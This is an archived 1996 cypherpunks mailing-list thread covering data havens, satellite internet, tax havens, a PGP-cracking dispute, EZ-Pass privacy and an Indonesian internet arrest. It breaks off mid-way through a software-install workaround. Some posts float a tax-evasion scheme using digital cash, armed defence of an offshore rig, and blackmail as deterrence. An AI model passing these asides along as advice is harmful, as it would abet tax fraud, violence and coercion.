A multi-port bridge gives you similar security capability,
but generally costs more because it needs buffering and
much more intelligence; the AT&T SmartHub was a lot simpler and
(in its day) cheaper.  It was about twice the cost of a regular hub,
half the excess from cool features and half because it was from AT&T :-)
It was less reliable than the regular hub, because it needed a fan
to handle the extra heat from the processor board, and 
was also more awkward to mount.  And the SNMP implementation was
rather buggy, though it did have a convenient PC SNMP manager
that knew how to use SNMP-over-MAC and the special features of the hub.
Cool device.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff@commtouch.co.il (geoff)
Date: Fri, 16 Aug 1996 10:42:35 +0800
To: unicorn@schloss.li
Subject: (NOISE) Re: Free Pronto Secure Offer
Message-ID: <19960815232910268.AAB222@[194.90.26.189]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: unicorn@schloss.li, cypherpunks@toad.com
Date: Fri Aug 16 02:41:34 1996
Unicorn,

> No, I was merely pointing out that if the review revealed that it
> had problems (one assumed that the intent of peer review is to reveal
> such problems in the first place, but perhaps you just like giving
> software away?) then the offered reward was valueless.

Peer review seems to have voted that their risk paid off.
 
> A lot of people use DES on this list too I'll wager.
and...

> I "tried out" your promotional scheme when I read your message, and
> it was that scheme which my opinion targeted.

You misinterpreted my reply to a list member's enquiry about whether 
our offer of Pronto Secure in exchange for feedback was still 
available. 
 
> This is a subjective question.
Yes.

> Cypherpunks is always getting the cash poor developer who thinks he
> very clever because he has to pay testers no money if he offers his 
> new product free to the person who discovers a flaw, or writes a 
> review.

Unicorn, you are again letting your fingers move faster than your 
brain. On what do you base your evaluation of our liquidity ? (not that 
it is relevant). Most Cypherpunks are technically savvy and crypto 
aware people, they provide a perfect community for evaluating and 
debugging a security enabling product. I would strongly recommend this 
route to any developer of serious security enhancing software. My 
sincere thanks to all c'punks who have and continue to provide 
incredibly valuable input into Pronto Secure.

> From your home page, I would guess that you request that reviewers
> allow you to make their comments public.  That's called an 
> endorsement, and, by the way, people are usually paid for them.  
> Sometimes in the millions. Think Michael Jordan is getting a deal 
> when you use his name to promote your product and then give him a 
> $99.00 piece of software (which is effectively worth the amount of 
> time it takes to write a few kiss ass paragraphs on the software, not 
> $99.00)?

Unicorn, you are again making groundless assumptions. I suggest that 
you do some fence painting before you enlighten us with your opinions 
about our "kiss ass paragraphs" of code.
Unless Michael Jordon is reading Schneier on the sly, his endorsement 
of Pronto secure is not worth 99c.

> Alturisim is a pipe dream.
Depends what you are putting in your pipe :)
I venture that most c'punks would agree that moving strong e-mail 
security into mainstream is a good thing. This is not going to happen 
without people making money from it.

>> Unicorn, you are invited to whitewash my fence :)
> Do I have to review pronto secure first?
Yes.

Geoff.

- ---------------------------------------------------------------
Geoff Klein, Pronto Secure Product Manager;   www.commtouch.com 
My PGP public Key 1814AD45 can be obtained by sending a message
to geoff@commtouch.co.il with "Get PGP Key" as the subject.
- ----------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMhO1s0Lv5OMYFK1FAQG5WAP/XoLteaVpdhnLpj/pk/1aPiWX7Nx/h1cc
5Sf0mgOWv3Q9MASWHV2lKrgqF9jc15ZaymfJZDq1duGttrPj6SJqX/nwOTcYi006
Hh3qh+LnXWnBd7QA/mZL5Fn4SLAOBno/uspqwMbM+6DCw39MpCY2NG0jQ2Qi8vMH
n1IG+PYYTAs=
=5HnW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Fri, 16 Aug 1996 12:11:21 +0800
To: cypherpunks@toad.com
Subject: Commercial Bundling
Message-ID: <Pine.HPP.3.91.960815185133.9093B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


A few days ago Eallensmith forwarded an article, which has lots of
references to economic scientific sources, by Andrew Odlyzko, AT&T:
'The bumpy road of electronic commerce'.

I didn't know that there is a whole theory of why and when and
how bundling of products work in commerce (but I should have guessed).

Soon after this article, published August 9, arguing why bundling
and subscriptions will take the lead over intelligent agent shopping
and personalized micro-retrievement on the net, came the following
announcement (quoting Edupage) from MS:

>Microsoft has struck deals that will allow it to bundle the Wall Street
>Journal's Interactive Addition and ESPN Sports Zone into its new version
>3.0 of Internet Explorer browser software ...

A networked computer with a bundled MS operating sytem, and a browser
already pointing to streamlined information. What more do we need?

This really fits in with Odluzko's predictions, and there is more to
come. According to Odluzko, bundling is not an evil but actually
does good for everyone, mostly (as does different prizes for different
customers). And most of us seem to prefer flat rates to pay-per-access.

He doesn't mention anything about the coming black market (of
crypto-anarchistic flavor), but then it isn't the subject of his
essay. 


Asgaard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Fri, 16 Aug 1996 21:17:34 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Protecting floating datahavens?
In-Reply-To: <199608160257.VAA20466@bermuda.io.com>
Message-ID: <Pine.SUN.3.94.960816025902.22381A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Aug 1996, Douglas R. Floyd wrote:
  
> > On Thu, 15 Aug 1996, William Knowles wrote:
> >
> > Something that I thought would make an excellent data haven 
> > would be older offshore oil platforms, Their size would 
> > allow extended living periods, electrcity and communications 
> > are in place, They are generally built outside of the 
> > territorial waters of most countries to avoid any damage 
> > to the shorelines if oil spilled (possibility for becoming 
> > its own country?)
>
> How would this rig be defended?
> 
> Pirates still exist.  Even if you can give them something to 
> think about with a 30/06 bullet at their waterline, there are 
> always small countries who have navies that can be hired.  
> They may be small and defenseless compared to the US navy, 
> but against a basically unarmed oil rig, do have the ability 
> to sink the rig at their whim.

Now I don't claim to be a naval defence expert, But from what 
I do read of the dogeared copies of Jane's Defence Weekly, 
Would be to install three or four Phalanx Close-In Weapons 
Systems, The Phalanx is a radar guided 20mm Gatling gun spraying 
out 4500 rpm at a range of 1600 yards.  Quite perfect for downing 
a privately owned MiG-21, Exocet missles from pissed off French 
gunboats for storing Chirac's medical records and maybe keeping 
those pesky mercenaries from skydiving onboard.

Since the fall of the Iron Curtain, there are literally all 
sorts of firepower for sale in the open markets, trolling in 
the alt.business newsgroups I have been able to find quite 
a few MiG's for sale, and there's a fellow in Finland that 
has a former Soviet 'Julliet Class' Diesel-Electric submarine 
and I understand he's taking offers.
 
Now this is a completely doable concept, and likely more realistic
than the Oceania project, Unfortunatly like all things, it comes
down to how much money you want to throw at it, I remember how 
many us on this list balked at Vince charging $500.00 for one
year on a Unix Shell account, I wonder what the market would 
bear for both a technologically and physically secure datahaven?

William Knowles
erehwon@c2.org


--
William Knowles    <erehwon@c2.org>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote for Harry Browne in November -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Fri, 16 Aug 1996 21:31:30 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: Anguilla - A DataHaven?
In-Reply-To: <Pine.SUN.3.95.960816071634.8723A-100000@netcom10>
Message-ID: <Pine.SUN.3.94.960816033853.22381B-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 16 Aug 1996, jonathon wrote:

> On Thu, 15 Aug 1996, William Knowles wrote:
> 
> > Something that I thought would make an excellent data haven would
> > be older offshore oil platforms, Their size would allow extended
> 
> 	These used to be the recommended way to go. 
> 
> 	If you have the cash, the cheapest way to go, is to just
> 	buy an island somewhere, and setup shop.   << Can I
> 	suggest buying Redonda?   >>

Where is Redonda on the map, I'm too lazy to look it up, 
The group working on the Oceania Project tried to find an 
accommodating country that would allow them to run as a soverign
nation, Last I heard they were planning to purchase a former 
hospital ship and refurbish it.
 
> > (possibility for becoming its own country?) and with the hoops
> 
> 	CF:   _How to create your own country_  distributed
> 	by Loompanics Press, for some of the problems that 
> 	are encountered in trying to do this. 

About now I am feeling like Woody Allen in 'Bananas' I'll find
Tim May becoming 'El Presidente' alerting everybody on the island
that their underwear will be worn on the outside, A yearly gift
of his weight in discarded AOL disks, and that everyone must own 
a hot-tub just like his  :) 

Cheers!

William Knowles
erehwon@c2.org


--
William Knowles    <erehwon@c2.org>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote for Harry Browne in November -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 16 Aug 1996 20:52:13 +0800
To: gbroiles@netbox.com (Greg Broiles)
Subject: Re: implausible defenses & tax havens
In-Reply-To: <2.2.32.19960816060630.006dc138@mail.io.com>
Message-ID: <199608160913.EAA18988@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Greg Broiles wrote:
> If you were on a jury, and you heard a defendant testify that they worked at
> a job site (either as an employee or a contractor) for years without ever
> being paid, and that they managed to maintain a lifestyle consistent with
> full-time work without ever receiving taxable income (whether as wages or
> dividends or interest or ..), and that the HR/personnel/AP people who
> testified that the defendant had been paid were mistaken or lying .. would
> you believe that testimony?

Suppose that a computer consultant Mr. X knows cryptography so well 
that his clients are willing to pay him $100/hr. Mr. X could conspire
with his client that he receives only $40/hr in taxable income, and the
rest he gets in form of digital cash.

If X lives sufficiently modestly, the IRS will be having hard times
getting him convicted. And really, what's the point in spending all this
money anyway? The more money one spends after a certain level, the more 
time one wastes.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: modemac@netcom.com (Modemac)
Date: Fri, 16 Aug 1996 13:13:05 +0800
To: cypherpunks@toad.com
Subject: Scientology *really* tries to crack PGP...AGAIN?!?
Message-ID: <199608160238.TAA28916@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Newsgroups: alt.religion.scientology,alt.security.pgp
From: grady@netcom.com (Grady Ward)
Subject: Criminal cult begins PGP crack attempt
Message-ID: <gradyDw7Cnt.I6A@netcom.com>

The Special Master has informed me that Madame Kobrin has
asked her to retain a PC expert to attempt to "crack" a
series of pgp-encrypted multi-megabyte files that were
seized along with more than a compressed gigabyte of other
material from my safety deposit box.

Ironically, they phoned to ask for assistance in supplying them with
a prototype "crack" program that they could use in
iterating and permuting possibilities. I did supply them
a good core pgpcrack source that can search several
tens of thousands of possible key phrases a seconds;
I also suggested that they should at least be using a P6-200
workstation or better to make the search more efficient.

The undercurrent is that this fresh hysterical attempt to "get"
something on me coupled with the daily settlement pleas reflects
the hopelessness of the litigation position of the criminal cult.

It looks like the criminal cult has cast the die to
ensure that the RTC vs Ward case is fought out to the bitter end.
Which I modestly predict will be a devastating, humiliating defeat
for them from a pauper pro per.

I have given them a final settlement offer that they can leave
or take. Actually they have a window of opportunity now to 
drop the suit since my counterclaims have been dismissed
(although Jusge Whyte invited me to re-file a new counterclaim
motion on more legally sufficiant basis).

I think Keith and I have found a successful counter-strategy to
the cult's system of litigation harassment.

Meanwhile, I could use some help from veteran a.r.s'ers.  
I need any copy you have of the Cease and Desist letter that you
may have received last year from Eliot Abelson quondam
criminal cult attorney and Eugene Martin Ingram spokespiece.


Physical mail:

Grady Ward
3449 Martha Ct.
Arcata, CA  95521-4884

JP's BMPs or fax-images to:

grady@northcoast.com

Thanks.

Grady Ward

Ps. I really do need all of your help and good wishes after all.
Thanks for all of you keeping the net a safe place to insult
kook kults.

--
                Reverend Modemac (modemac@netcom.com)
   First Online Church of "Bob"      "There is no black and white."
 PGP Key Fingerprint: 47 90 41 70 B4 5B 06 90 7B 38 4E 11 8A ED 80 DF
               URL: http://www.tiac.net/users/modemac/
      (FINGER modemac@netcom.com for a FREE SubGenius Pamphlet!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C. Randolph" <jcr@idiom.com>
Date: Fri, 16 Aug 1996 23:21:14 +0800
To: cypherpunks@toad.com
Subject: Lunch with Bill, anyone?
Message-ID: <199608161231.FAA05532@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


Latest from Microsoft(R):

> > The Windows 95 Anniversary is just around the corner.
> > Stay tuned to WinNews for special announcements to learn how
> > you could win lunch with Bill Gates, chat with industry
> > luminaries, and download a really cool screen saver.

Does Microsquish *know* any industry luminaries?  I mean, Cutler
used to be one, but he's pretty burnt out, if Windoze NT is any
indication.

> Seems a fine opportunity.  Though Bill _and_ the screen saver might
> be just too much excitement for one day.

Meeting Bill Gates would be every bit as exciting as meeting Tony 
Orlando.  Or maybe Wayne Newton.

-jcr







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 17 Aug 1996 01:25:24 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Schlafly helped defeat ERA, supported Goldwater--where do I , sign up?
In-Reply-To: <ae38a35e01021004be6d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960816071427.409B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Keep in mind the BCFE comes from a traditional liberal bent. However, 
even though Schlafly is no friend of free speech as it relates to 
sexually explicit material, I welcome her participation in the wiretap 
debate. Privacy cuts across partisan lines.

I would love to have her column in the hands of some of the Republican
senators who will vote on the House wiretap bill or craft their own next
month.

-Declan



On Thu, 15 Aug 1996, Timothy C. May wrote:

> At 1:53 PM 8/15/96, Declan McCullagh wrote:
> >Take a look at the Boston Coalition for Freedom of Expression's list of
> >enemies of free expression. Excerpt follows.
> 
> 
> >Linkname: Phyllis Schlafly, Eagle Forum
> >Filename: http://www.eff.org/pub/Groups/BCFE/bcfenatl.html#Schlafly
> >
> >   Phyllis Schlafly
> ....
> >   "Leading the pro-family movement to victories since 1972." Basic
> >   membership includes a subscription to The Phyllis Schlafly Report and
> >   costs $15.00. Mrs. Schlafly, whose husband Fred used to head the World
> >   Anti-Communist League, is the person considered most responsible for
> >   the defeat of the ERA. Her book A Choice Not an Echo, published in
>         ^^^^^^^^^^^^^^^^^
> >   1964 to support the presidential aspirations of Barry Goldwater, is
>                                                     ^^^^^^^^^^^^^^^
> >   one of the seminal texts of contemporary American conservative
> >   politics.
> 
> So, she helped defeat the ERA and supported Goldwater. Sounds pretty good
> to me. From this excerpt, I'd call her a friend of liberty.
> 
> (Yes, I'm serious. Some of you find it hard to tell when I'm being
> completely serious and when I'm being facetious, so I thought I'd clarify
> this.)
> 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 16 Aug 1996 17:33:58 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: Anguilla - A DataHaven?
In-Reply-To: <Pine.SUN.3.94.960815104107.8090A-100000@infinity.c2.net>
Message-ID: <Pine.SUN.3.95.960816071634.8723A-100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Aug 1996, William Knowles wrote:

> Something that I thought would make an excellent data haven would
> be older offshore oil platforms, Their size would allow extended

	These used to be the recommended way to go. 

	If you have the cash, the cheapest way to go, is to just
	buy an island somewhere, and setup shop.   << Can I
	suggest buying Redonda?   >>

> (possibility for becoming its own country?) and with the hoops

	CF:   _How to create your own country_  distributed
	by Loompanics Press, for some of the problems that 
	are encountered in trying to do this. 

> oil platform.  You have to wonder how cheap these could sell 
> for just to get them off the oil companies hands? 

	Starting bids are roughly $10^6 each.

        xan

        jonathon
        grafolog@netcom.com



		VapourWare is like the Tao,
		Looked for it cannot be found,
		Reached for it cannot be touched,
		Waited for not even FedX can deliver;
		            <Paid for it will not be refunded>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bugs@netcom.com (Mark Hittinger)
Date: Sat, 17 Aug 1996 01:40:51 +0800
To: cypherpunks@toad.com
Subject: re: Billy boy's satellites [Was - Floating DataHavens]
Message-ID: <199608161424.HAA03018@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>
> > Vincent Cate wrote:
> > You can get Internet via radio links for reasonable prices.  And via
> > satellite for almost affordable prices.  When Bill Gates 900 satellites
> > get up there it should be very affordable.
>
> Gary Howland wrote:
> ... if a tad unrealiable?
> The thought of 900 satelites in low orbit, all running NT, makes me
> shudder.  Brings a new meaning to the expression "OS crash".
> 

Its been a little over a year but I had heard that the current design was
for a lower number of MEO satellites.  

I would think that cypherpunks would want to see this happen.  The political
problems are probably larger than the technical ones :-)

Regards,

Mark Hittinger
Netcom/Dallas
bugs@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 17 Aug 1996 05:16:54 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: Billy boy's satellites [Was - Floating DataHaven]
In-Reply-To: <321446BF.20431CA7@systemics.com>
Message-ID: <Pine.SUN.3.91.960816084343.22824A-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 16 Aug 1996, Gary Howland wrote:

> Doesn't the low orbit part mean that the satellites will have a
> low life expectancy, meaning a new launch every couple of days?

"Low orbit" is used in a relative sense as compared to satellites
in geosynchronous orbit.  The Teledesic satellites will orbit in
the 700km range--hundreds of kilometers above the wispy highest
reaches of earth's astmosphere.  At that height, there will be
virtually no difference in orbital decay from that of 
geosynchronous birds.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 17 Aug 1996 00:00:28 +0800
To: cypherpunks@toad.com
Subject: NPR Science Friday for 8/16
Message-ID: <v03007800ae39ed8a7843@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: oldbear@pop.tiac.net
Mime-Version: 1.0
Date: Fri, 16 Aug 1996 08:54:37 -0300
To: dcsb@ai.mit.edu (Digital Commerce Society of Boston)
From: The Arctos Group <arctos@arctos.com>
Subject: NPR Science Friday for 8/16

This afternoon's program on "Science Friday" on National Public 
Radio, broadcast from Washington, DC at 1800hrs GMT (2PM EDT) is on 
the future of the internet.  I was unable to get a list of guests, 
but past programs would suggest that there likely will be some 
interesting individuals.  Host Ira Flatow is much more techno-savvy 
than the usual broadcast personality.

Here is the description from the npr.org web site:

  Show Date: 8/16/96

  Topic for Hour One: Internet Update

  Synopsis:  A War is waging over the future of the Internet.  Who 
  will control it, and what will it look and sound like as it reaches 
  maturity?  In this hour of Science Friday, find out who the players 
  are, and what you can expect to see, or not see, on your computer 
  screen in the years to come. 

Sorry for the short notice.  I just heard the teaser this morning.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Sat, 17 Aug 1996 05:56:08 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: remailers/kiddie porn
In-Reply-To: <199608160454.VAA00547@toad.com>
Message-ID: <199608161625.JAA21883@lachesis.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


> and I doubt there are 5000 addresses on nymservers or
> reply-block users.

	There are probably more than this amount.


-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 17 Aug 1996 05:00:49 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Re: Anguilla - A DataHaven?
In-Reply-To: <199608160257.VAA20466@bermuda.io.com>
Message-ID: <Pine.LNX.3.93.960816100102.194B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Aug 1996, Douglas R. Floyd wrote:
> > On Thu, 15 Aug 1996, Arun Mehta wrote:
> > > I'm sure this has come up before, but what would prevent a server
> > > being located on a buoy or something at sea outside territorial
> > > limits (or when satellites become cheaper, on a satellite itself)
> > > offering such services?  
> > living periods, electrcity and communications are in place, They
> > are generally built outside of the territorial waters of most
> > countries to avoid any damage to the shorelines if oil spilled
> > (possibility for becoming its own country?) and with the hoops
> > that Shell Oil went through to please Greenpeace with its last
> > oil platform.  You have to wonder how cheap these could sell 
> > for just to get them off the oil companies hands? 
> (The machine crashed when I was writing this letter, so if cpunks got two,
> I apologize.)
> How would this rig be defended?

     .50 Machine guns on the decks, everyone on board capable of shooting 
straight carrying at least a pistol and gas masks. The gas masks are for the 
tear gas dispencers. 

    Hire Vinnie? 

    There are ways to make it inadvisable to attack the system. Blackmail 
material is always a good thing. 


> Pirates still exist.  Even if you can give them something to think about
> with a 30/06 bullet at their waterline, there are always small countries
> who have navies that can be hired.  They may be small and defenseless
> compared to the US navy, but against a basically unarmed oil rig, do have
> the ability to sink the rig at their whim.

     A couple of surplus wire guided missles might go a long way to disuading
them. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Sat, 17 Aug 1996 04:35:23 +0800
To: cypherpunks@toad.com
Subject: Rubber Hose Algorithm
Message-ID: <m0urQVB-00015tC@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a lot of armchair theorizing on this list about government
oppression and such. For comparison purposes, here is a real-life 
example:

=========================================

From: 	hrwatchnyc@igc.org
Sent: 	15 Agustus 1996 7:00
Subject: 	Indonesia--Arrest of Lecturer for Internet Communication

Human Rights Watch sent the following letter, protesting the arrest of a
university lecturer for communicating on the Internet, to the Indonesian
government today.

August 14, 1996

His Excellency M. Arifin Siregar
Ambassador to the United States
Embassy of Indonesia
2020 Mass. Avenue, NW
Washington, DC  20036

Your Excellency:

     I am writing on behalf of Human Rights Watch/Asia to protest the 
arrest of Drs. Prihadi Beny Waluyo, a lecturer at Duta Wacana Christian 
University. Drs. Waluyo was arrested at his home by soldiers of the 
district military command. He was reportedly accused of distributing e-mail 
messages and also of sending messages relating to the July 27 riots to a 
destination in Holland. His arrest came after an unidentified person gave 
an officer photocopies of e-mail messages that were traced to Drs. Waluyo. 
The person claimed the printouts came from a store in Kebumen, a district 
of Yogyakarta.

     Following his arrest, Drs. Waluyo was interrogated by the military 
about his connections with the Peoples Democratic Party (PRD), which the 
government has accused of masterminding the riots, but he denied any 
involvement with the PRD. He acknowledged that he had sent messages over 
the Internet. Following his questioning, he was reportedly ordered to go to 
his home and was told to report to the district military command on a 
regular basis. He is said to be under strict surveillance.

     Human Rights Watch opposes actions by the Indonesian government to 
restrict electronic communication. As stated in Article 19 of the Universal 
Declaration of Human Rights:

     Everyone has the right to freedom of opinion and expression: this
     right includes freedom to hold opinions without interference and to
     seek, receive and impart information and ideas through any media and
     regardless of frontiers.

We believe that such forums provide a truly unique opportunity for people 
from around the globe to share their views with an international audience. 
By allowing unrestricted communication, important issues can receive the 
benefit of serious discussion by the broadest cross-section of society. If 
the Internet is to achieve its potential to become a global information 
infrastructure, it is important, at the present moment, to agree to allow 
its unrestricted development.

     We urge that Drs. Waluyi and every other citizen be allowed to receive 
and transmit electronic mail without fear of harassment, intimidation, or 
arrest.

Sincerely,
Sidney Jones
Executive Director
Human Rights Watch/Asia

cc:  His Excellency Nugroho Wisnumurti, Ambassador to the United Nations

Gopher Address://gopher.humanrights.org:5000
Listserv address: To subscribe to the list, send an e-mail message to
majordomo@igc.apc.org with "subscribe hrw-news" in the body of the message
(leave the subject line blank).

Human Rights Watch
485 Fifth Avenue
New York, NY 10017-6104
TEL: 212/972-8400
FAX: 212/972-0905
E-mail: hrwnyc@hrw.org

1522 K Street, N.W.
Washington D.C. 20005
TEL: 202/371-6592
FAX: 202/371-0124
E-mail: hrwdc@hrw.org

=========================================

ObCrypto:

On the brighter side, some individuals on soc.culture.indonesia
have become remailer users. Others have been forging Usenet
headers with varying degrees of success.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George Kuzmowycz" <gkuzmo@ix.netcom.com>
Date: Sat, 17 Aug 1996 01:26:49 +0800
To: cypherpunks@toad.com
Subject: Re: photographed license plates
Message-ID: <199608161428.HAA16044@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Aug 96 at 22:12, The Prisoner wrote:

> Timothy C. May wrote:
> > 
> > [WHACK]
> 
> > Maybe we'll have barcoded license plates sooner than we think. Then all of
> > those speed cameras can also track our movements.
> > 
> 
> No, too low-tech.
> 
> Small trasnsmitters with unique programmed ID codes broadcast as you drive.  Much easier to trace.  And LoJack's 
> already got a good bit of the technology in place.
> 

  Actually, a system like this is in place for toll collection in and 
around New York City, and on the New York State Thruway (a toll road 
that runs from NYC to Buffalo). It's called EZ-Pass, and involves 
some sort of programmed radio device that's scanned by the toll booth 
as you pass through. It can even automatically debit your VISA 
account. I am not aware of what representations, if any, they've made 
about the privacy of the data.

  An interesting economic point is that for the NYC bridges and 
tunnels, at least, EZ-Pass is now the only way to get discounted 
fares. The toll is $3.50 per bridge crossing. It used to be that they 
sold tokens, and if you bought a roll of tokens you'd get a 
discounted rate. Now they no longer sell the tokens in bulk, but the 
same discount is applied if you use the EZ-Pass system. The anonymous 
transaction is now the more costly one.

        -gk-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 17 Aug 1996 07:09:18 +0800
To: "John C. Randolph" <cypherpunks@toad.com
Subject: [Noise] Re: Lunch with Bill, anyone?
Message-ID: <2.2.32.19960816180029.00b2708c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:31 AM 8/16/96 -0700, John C. Randolph wrote:
>Latest from Microsoft(R):
>
>> > The Windows 95 Anniversary is just around the corner.
>> > Stay tuned to WinNews for special announcements to learn how
>> > you could win lunch with Bill Gates, chat with industry
>> > luminaries, and download a really cool screen saver.

Do we get to decide where to have lunch?  I know this great biker bar... ]:>
---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Sat, 17 Aug 1996 07:40:45 +0800
To: sryan@reading.com
Subject: Installing IE 3.0 Final under NT 4.0b2 [Was Re:NT remailer]
Message-ID: <199608161805.LAA06902@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: rednax@asiapac.net, sryan@reading.com, cypherpunks@toad.com
Date: Fri Aug 16 13:05:38 1996
You can try the following.  I will be attempting it myself tonight.  I also 
understand that the 128-bit version is available again.

Good luck!

Lou Zirko

- ----Forwarded----
 From: "Scott Johnson" <sjohnson@iscdist.com>
Subject: Re: Beware V3 of Internet Explorer
Newsgroups: comp.os.ms-windows.nt.pre-release,comp.os.ms-windows.nt.misc
References: <1996Aug13.085057.6086@news.ntrs.com>
Organization: ISC Distributors, Inc.
Message-ID: <01bb88d4$f88dd6b0$c8c1a0cc@sjohnson>
X-Newsreader: Microsoft Internet News 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
NNTP-Posting-Host: sjohnsonnt
Date: 13 Aug 96 17:09:07 GMT
Lines: 34
Path: 
news.c2.org!news.zeitgeist.net!cygnus.com!news.sgi.com!enews.sgi.com!su-new
s-f
eed4.bbnplanet.com!news.theglobal.net!
Xref: news.c2.org comp.os.ms-windows.nt.pre-release:10225 
comp.os.ms-windows.nt.misc:137713

There is a way to get the production release to run on the beta II of NT. 
It requires a little work but it does run fine.  It seems the only problem
is in the install.  If you follow these steps you can use the install from
the beta if IE 3.0 Beta II on the production cab file and it will install.

1. Run the self extracting cab file for the beta II of IE.  This should
produce a temporary dir in the temp dir on drive c.  You will have to find
it as it is named something different each time.

2. When you run this the first question will be do you want to cont. Answer
yes. When it asks for you to agree to the lic. look for the temp dir. Make
